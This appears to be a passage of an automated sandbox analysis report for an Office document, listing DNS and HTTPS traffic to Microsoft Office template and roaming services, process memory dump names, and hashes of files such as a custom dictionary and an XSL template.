Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 52.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.16.76.107:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
GB 104.77.160.197:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 107.76.16.2.in-addr.arpa udp
US 8.8.8.8:53 197.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/1076-1-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-3-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-2-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-0-0x00007FF9F7BED000-0x00007FF9F7BEE000-memory.dmp

memory/1076-4-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-5-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-6-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-7-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-10-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-11-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-12-0x00007FF9B5270000-0x00007FF9B5280000-memory.dmp

memory/1076-9-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-8-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-14-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-16-0x00007FF9B5270000-0x00007FF9B5280000-memory.dmp

memory/1076-15-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-19-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-18-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-17-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-13-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/1076-37-0x00007FF9F7BED000-0x00007FF9F7BEE000-memory.dmp

memory/1076-38-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-39-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-40-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 23e1abb3bd27eafe4b6c805191396e80
SHA1 b7d02c139ba96049b63df3864f3853da9af9e75a
SHA256 9551283cbacddde65f203fec1234434766976011adc800dc851fb29e81348a66
SHA512 f27db6eff9034560883c7b2a29740c63ece747623a0e8abaddb936fbee8ad7bf5d6ad466921d5c2a2000f00dbee24b444720c19732d55b1ffbf4b6e985dfd556

C:\Users\Admin\AppData\Local\Temp\TCDE311.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e